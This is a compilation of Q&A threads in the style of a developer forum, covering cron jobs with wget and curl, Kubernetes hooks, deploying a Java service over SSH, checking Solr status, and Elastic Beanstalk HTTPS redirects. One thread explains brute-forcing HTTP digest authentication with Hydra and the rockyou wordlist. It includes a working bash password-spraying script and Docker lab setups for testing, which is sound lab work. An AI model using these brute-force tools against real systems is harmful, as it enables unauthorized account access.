After apache rebuilt my cron jobs stopped working.
I used the following command:
wget -O - -q -t 1 http://example.com/cgi-bin/loki/autobonus.pl
Now my DC support suggests me to change the wget method to curl. What would be the correct value in this case?
-O - is equivalent to curl's default behavior, so that's easy.
-q is curl's -s (or --silent)
--retry N will substitute for wget's -t N
All in all:
curl -s --retry 1 http://example.com/cgi-bin/loki/autobonus.pl
try run change with the full path of wget
/usr/bin/wget -O - -q -t 1 http://example.com/cgi-bin/loki/autobonus.pl
you can find the full path with:
which wget
and more, check if you can reach the destination domain with ping or other methods:
ping example.com
Update:
based on the comments, seems to be caused by the line in /etc/hosts:
127.0.0.1 example.com #change example.com to the real domain
It seems that you have restricted options in terms that on the server where the cron should run you have the domain pinned to 127.0.0.1 but the virtual host configuration does not work with that.
What you can do is to let wget connect by IP but send the Host header so that the virtual host matching would work:
wget -O - -q -t 1 --header 'Host: example.com' http://xx.xx.35.162/cgi-bin/loki/autobonus.pl
Update
Also probably you don't need to run this over the web server, so why not just run:
perl /path/to/your/script/autobonus.pl
Related
I am having some trouble brute forcing a HTTP digest form with Hydra. I am using the following command however when proxied through burp suite hydra I can see hydra is using basic auth and not digest.
How do I get hydra to use the proper auth type?
Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -vV http-get /digest
Request as seen in proxy:
GET /digest HTTP/1.1
Host: 127.0.0.1
Connection: close
Authorization: Basic YWRtaW46aWxvdmV5b3U=
User-Agent: Mozilla/4.0 (Hydra)
I have studied this case, if the digest method is implemented on Nginx or apache servers level, hydra might work. But if the authentication is implemented on the application server like Flask, Expressjs, Django, it will not work at all
You can create a bash script for password spraying
#!/bin/bash
cat $1 | while read USER; do
cat $2 | while read PASSWORD; do
if curl -s $3 -c /tmp/cookie --digest -u $USER:$PASSWORD | grep -qi "unauth"
then
continue
else
echo [+] Found $USER:$PASSWORD
exit 0
fi
done
done
Save this file as app.sh
$ chmod +x app.sh
$ ./app.sh /path/to/users.txt /path/to/passwords.txt http://example.com/path
Since no Hydra version was specified, I assume the latest one: 9.2.
#tbhaxor is correct:
Against a server like Apache or nginx Hydra works. Flask using digest authentication as recommended in the standard documentation does not work (details later). You could add the used web server so somebody can verify this.
Hydra does not provide explicit parameters to distinguish between basic and digest authentication.
Technically, it first sends a request that attempts to authenticate itself via basic authentication. After that it evaluates the corresponding response.
The specification of digest authentication states that the web application has to send a header WWW-Authenticate : Digest ... in the response if the requested documented is protected using the scheme.
So Hydra now can distinguish between the two forms of authentication.
If it receives this response (cf. code), it sends a second attempt using digest authentication.
The reason why you only can see basic auth and not digest requests is due to the default setting of what Hydra calls "tasks". This is set to 16 by default, which means it initially creates 16 threads.
Thus, if you go to the 17th request in your proxy you will find a request using digest auth. You can also see the difference if you set the number of tasks to 1 with the parameter -t 1.
Following 3 Docker setups where you can test the differences in basic auth (nginx), digest auth(nginx) and digest auth(Flask) using "admin/password" credentials based upon your example:
basic auth:
cat Dockerfile.http_basic_auth
FROM nginx:1.21.3
LABEL maintainer="secf00tprint"
RUN apt-get update && apt-get install -y apache2-utils
RUN touch /usr/share/nginx/html/.htpasswd
RUN htpasswd -db /usr/share/nginx/html/.htpasswd admin password
RUN sed -i '/^ location \/ {/a \ auth_basic "Administrator\x27s Area";\n\ auth_basic_user_file /usr/share/nginx/html/.htpasswd;' /etc/nginx/conf.d/default.conf
:
sudo docker build -f Dockerfile.http_basic_auth -t http-server-basic-auth .
sudo docker run -ti -p 127.0.0.1:8888:80 http-server-basic-auth
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (nginx):
cat Dockerfile.http_digest
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update && \
# For digest module
DEBIAN_FRONTEND=noninteractive apt-get install -y curl unzip \
# For nginx
build-essential libpcre3 libpcre3-dev zlib1g zlib1g-dev libssl-dev libgd-dev libxml2 libxml2-dev uuid-dev make apache2-utils expect
RUN curl -O https://nginx.org/download/nginx-1.21.3.tar.gz
RUN curl -OL https://github.com/atomx/nginx-http-auth-digest/archive/refs/tags/v1.0.0.zip
RUN tar -xvzf nginx-1.21.3.tar.gz
RUN unzip v1.0.0.zip
RUN cd nginx-1.21.3 && \
./configure --prefix=/usr/share/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/ nginx.lock --pid-path=/run/nginx.pid --modules-path=/etc/nginx/modules --add-module=../nginx-http-auth-digest-1.0.0/ && \
make && make install
COPY generate.exp /usr/share/nginx/html/
RUN chmod u+x /usr/share/nginx/html/generate.exp && \
cd /usr/share/nginx/html/ && \
expect -d generate.exp
RUN sed -i '/^ location \/ {/a \ auth_digest "this is not for you";' /etc/nginx/nginx.conf
RUN sed -i '/^ location \/ {/i \ auth_digest_user_file /usr/share/nginx/html/passwd.digest;' /etc/nginx/nginx.conf
CMD nginx && tail -f /var/log/nginx/access.log -f /var/log/nginx/error.log
:
cat generate.exp
#!/usr/bin/expect
set timeout 70
spawn "/usr/bin/htdigest" "-c" "passwd.digest" "this is not for you" "admin"
expect "New password: " {send "password\r"}
expect "Re-type new password: " {send "password\r"}
wait
:
sudo docker build -f Dockerfile.http_digest -t http_digest .
sudo docker run -ti -p 127.0.0.1:8888:80 http_digest
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (Flask):
cat Dockerfile.http_digest_fask
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update -y && \
apt-get install -y python3-pip python3-dev
# We copy just the requirements.txt first to leverage Docker cache
COPY ./requirements.txt /app/requirements.txt
WORKDIR /app
RUN pip3 install -r requirements.txt
COPY ./app.py /app/
CMD ["flask", "run", "--host=0.0.0.0"]
:
cat requirements.txt
Flask==2.0.2
Flask-HTTPAuth==4.5.0
:
cat app.py
from flask import Flask
from flask_httpauth import HTTPDigestAuth
app = Flask(__name__)
app.secret_key = 'super secret key'
auth = HTTPDigestAuth()
users = {
"admin" : "password",
"john" : "hello",
"susan" : "bye"
}
#auth.get_password
def get_pw(username):
if username in users:
return users.get(username)
return None
#app.route("/")
#auth.login_required
def hello_world():
return "<p>Flask Digest Demo</p>"
:
sudo docker build -f Dockerfile.http_digest_flask -t digest_flask .
sudo docker run -ti -p 127.0.0.1:5000:5000 digest_flask
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 5000 http-get /
If you want to see more information I wrote about it in more detail here.
According to the below documentation, the line "HTTP - Executes an HTTP request against a specific endpoint on the Container."
https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#hook-handler-implementations
Using preStop hook, I tried to curl to run the following script but it returns nothing. Is the prestop hook limited to use the Http request within the container i.e, localhost?
echo "test curl" > /proc/1/fd/1
echo $(curl -s /dev/null http://google.com) > /proc/1/fd/1
echo $(curl -s -o /dev/null -w "%{http_code}" http://google.com) > /proc/1/fd/1
No, as I know you are not limited to use preStop's httpGet only withing the container. Your cointainer should just have access yo requested url, etc. So in your case you should have access to google.
May I know what exactly you wanna to achieve? Are you trying to redirect curl output to proc with PID:1 ?
Your command perfectly works in containers(that has curl itself), when I specify redirect to STDOUT, I mean /proc/self/fd/1
kubectl exec -ti curl -- bash
root#curl:/# echo $(curl -s -o /dev/null -w "%{http_code}" http://google.com) > /proc/self/fd/1
301
Btw, you can use exec instead of httpGet in preStop, where you can combine echo and curl
Yaml will be similar to
lifecycle:
preStop:
exec:
command: ["curl", "-XPOST", "-s", "http://google.com" > "/proc/1/fd/1"]
Please play with command and adjust for your needs. I havent tested it, wrote on flight
I have the need to start a java rest server with concourse that lives on an Ubuntu 18.04 machine. The version of concourse my company uses is 5.5.11. The server code is written in Java, so a simple java -jar <uber.jar> suffices from the command line (see below). In production, I will not have this simple luxury, hence my question.
I have an scp command working that copies the .jar from concourse to the target Ubuntu machine:
scp -i /tmp/key.p8 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ./${NEW_DIR}/${ARTIFACT_NAME}.${ARTIFACT_FILE_TYPE} ${SRV_ACCOUNT_USER}#${JAVA_VM_HOST}:/var/www
Note that my private key is passed with -i and I can confirm that is working.
I followed this other SO Q&A that seemed to be promising: Getting ssh to execute a command in the background on target machine
, but after trying a few permutations of the suggested solution and other answers, I still don't have my rest service kicked off.
I've tried a few permutations of this line in my concourse script:
ssh -f -i /tmp/pvt_key1.p8 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ${SRV_ACCOUNT_USER}#${JAVA_VM_HOST} "bash -c 'nohup java -jar /var/www/${ARTIFACT_NAME}.${ARTIFACT_FILE_TYPE} -c \"/opt/testcerts/clientkeystore\" -w \"password\" > /dev/null 2>&1 &'"
I've tried with and without the -f and -t switches in ssh, with and without the file stream redirection, with and without nohup and the Linux background ('&') command and various ways to escape the quotes.
At the bash prompt, this line successfully starts my server. The two switches are needed to point to the certificate and provide the password:
java -jar rest-service.jar -c "/opt/certificates/clientkeystore" -w "password"
I really think this is possible to do in Concourse, but I'm stuck at this point.
After a lot of trial an error, it seems I needed to do this:
ssh -f -i /tmp/pvt_key1.p8 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null ${SRV_ACCOUNT_USER}#${JAVA_VM_HOST} "bash -c 'sudo java -jar /var/www/${ARTIFACT_NAME}.${ARTIFACT_FILE_TYPE} -c \"/path/to/my/certificate\" -w \"password\" > /var/www/log.txt 2>&1 &'"
The key was I was missing the 'sudo' portion of the command. Using nohup as opposed to putting in a Linux bash background indicator ('&') seems to give me an error in the pipeline. This works for me, but others are welcome to post responses with better answers or methods that might be a better practice.
We have a few servers that are going to be rebooted soon and I may have to restart Apache Solr manually.
How can I verify (from the command line) that Solr is running?
The proper way is to use Solr's STATUS command. You could parse its XML response, but as long as it returns something to you with an HTTP status of 200, it should be safe to assume it's running. You can perform an HTTP HEAD request using curl with:
curl -s -o /dev/null -I -w '%{http_code}' http://example.com:8983/solr/admin/cores?action=STATUS
NOTE: Also, you can add a -m <seconds> to the command to only wait so many seconds for a response.
This will make a request to the Solr admin interface, and print out 200 on success which can be used from a bash script such as:
RESULT=$(curl -s -o /dev/null -I -w '%{http_code}' http://example.com:8983/solr/admin/cores?action=STATUS)
if [ "$RESULT" -eq '200' ]; then
# Solr is running...
else
# Solr is not running...
fi
If you are on the same machine where Solr is running then this is my favourite:
$> solr status
My domain is pointing to a Beanstalk app (DNS ALIAS).
I have already set up SSL certificates properly on my Beanstalk instance.
So now:
http://www.mysite.com -> Beanstalk app with http
https://www.mysite.com -> Beanstalk app with https
I would like to redirect all http requests to https. So http://www.mysite.com -> https://www.mysite.com
I already tried to create an AWS container to implement something like "server { listen 80; return 301 https://www.mysite.com/$request_uri;}" but it is not working.
I have already spent several hours on Google trying to find some guidance on how to do that. I found some clues such as the 301 redirect, rewrite... but I am not being able to apply any solution to my Beanstalk EC2 instance.
Perhaps I need a more detailed explanation on how to do that.
Could someone help me, please?
PS: one thing that I am struggling to understand is the fact that the Load Balancer says that Load Balancer Port 80 is pointing to Instance Port 80 and Load Balancer Port 443 (HTTPS) is also pointing to Instance Port 80, but with Cipher/SSL cert.
Well, when I examine the nginx configuration files on my EC2 instance I only find a "server { listen 8080", not "listen 80".
Thank you all.
I've online this solution.
Add .ebextensions/00_nginx_https_rw.config
files:
"/tmp/45_nginx_https_rw.sh":
owner: root
group: root
mode: "000644"
content: |
#! /bin/bash
CONFIGURED=`grep -c "return 301 https" /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf`
if [ $CONFIGURED = 0 ]
then
sed -i '/listen 8080;/a \ if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; } \n' /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf
logger -t nginx_rw "https rewrite rules added"
exit 0
else
logger -t nginx_rw "https rewrite rules already set"
exit 0
fi
container_commands:
00_appdeploy_rewrite_hook:
command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/appdeploy/enact
01_configdeploy_rewrite_hook:
command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact
02_rewrite_hook_perms:
command: chmod 755 /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
03_rewrite_hook_ownership:
command: chown root:users /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
Based on the code above, this is the code that I used to redirect the http requests to https for a standalone (i.e. not behind a load balancer) Docker image:
files:
"/tmp/000_nginx_https_redirect.sh":
owner: root
group: root
mode: "000644"
content: |
#!/bin/bash
sed -i 's/80;/80;\n return 301 https:\/\/$http_host$request_uri;\n/' /etc/nginx/sites-available/elasticbeanstalk-nginx-docker-proxy.conf
container_commands:
00_appdeploy_rewrite_hook:
command: cp -v /tmp/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/appdeploy/enact
01_configdeploy_rewrite_hook:
command: cp -v /tmp/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/configdeploy/enact
02_rewrite_hook_perms:
command: chmod 755 /opt/elasticbeanstalk/hooks/appdeploy/enact/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/000_nginx_https_redirect.sh
03_rewrite_hook_ownership:
command: chown root:users /opt/elasticbeanstalk/hooks/appdeploy/enact/000_nginx_https_redirect.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/000_nginx_https_redirect.sh
For those, who don't use the Load Balancer, the if block from user3888643's answer wouldn't work. So I've removed it completely (not sure if this solution has any problems) and it works for me:
sed -i '/listen 8080;/a \ if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; }\n' /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf
to:
sed -i '/listen 8080;/a \ return 301 https://$host$request_uri;\n' /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf
I wasn't sure if user3888643's answer was still the correct one, since aws updated the way some of their own setup scripts run on elastic beanstalk earlier this year, but I just checked with aws support, this is still the advised solution. Add a file to .ebextensions, e.g .ebextensions/00_nginx_https_rw.config with the following contents
files:
"/tmp/45_nginx_https_rw.sh":
owner: root
group: root
mode: "000644"
content: |
#!/usr/bin/env bash
CONFIGURED=`grep -c "return 301 https" /opt/elasticbeanstalk/support/conf/webapp.conf`
if [ $CONFIGURED = 0 ]
then
sed -i '/ location \/ {/a \ if ($http_x_forwarded_proto = "http") { \n return 301 https://$host$request_uri;\n }' /opt/elasticbeanstalk/support/conf/webapp.conf
logger -t nginx_rw "https rewrite rules added"
exit 0
else
logger -t nginx_rw "https rewrite rules already set"
exit 0
fi
container_commands:
00_appdeploy_rewrite_hook:
command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/appdeploy/enact
01_configdeploy_rewrite_hook:
command: cp -v /tmp/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact
02_rewrite_hook_perms:
command: chmod 755 /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
03_rewrite_hook_ownership:
command: chown root:users /opt/elasticbeanstalk/hooks/appdeploy/enact/45_nginx_https_rw.sh /opt/elasticbeanstalk/hooks/configdeploy/enact/45_nginx_https_rw.sh
04_reload_nginx:
command: /etc/init.d/nginx reload
One thing to look out for: I found I couldn't deploy this because of an interaction between a previous (incorrect) version of the file in .ebextensions, there would be an error and the deployment would fail, even though the file was no longer in the repo being deployed. :
[Instance: i-0c767ece] Command failed on instance.
Return code: 6
Output: nginx: [warn] duplicate MIME type "text/html" in /etc/nginx/nginx.conf:38 nginx:
[emerg] unknown directive "...." in /etc/nginx/conf.d/000_config.conf:4
nginx: configuration file /etc/nginx/nginx.conf test failed.
container_command 04_reload_nginx in .ebextensions/ssl_redirect.config failed.
For more detail, check /var/log/eb-activity.log using console or EB CLI.
It looks like each instance still had a copy of the previously deployed file in /etc/nginx/conf.d/, so I had to go into each instance and delete my previous config files in /etc/nginx/conf.d , once I did that the deployment went through fine.